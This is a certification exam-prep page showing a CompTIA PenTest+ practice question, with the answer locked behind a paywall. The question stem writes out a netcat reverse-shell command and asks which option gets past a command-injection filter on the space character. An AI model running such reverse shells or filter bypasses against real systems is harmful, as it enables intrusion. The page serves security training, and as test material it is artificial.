CompTIACompTIA
PT0-003 · Question #26
PT0-003 Question #26: Real Exam Question with Answer & Explanation
Sign in or unlock PT0-003 to reveal the answer and full explanation for question #26. The question stem and answer options stay visible for context.
Submitted by ricky.ec· Mar 6, 2026Attacks and Exploits
Question
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command: nc -e /bin/sh 10.10.10.16 4444 Which of the following would most likely bypass the filtered space character?
Options
- A${IFS}
- B%0a
- C+ *
- D%20
Unlock PT0-003 to see the answer
You've previewed enough free PT0-003 questions. Unlock PT0-003 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#command injection#web application exploits#bypass techniques#shell scripting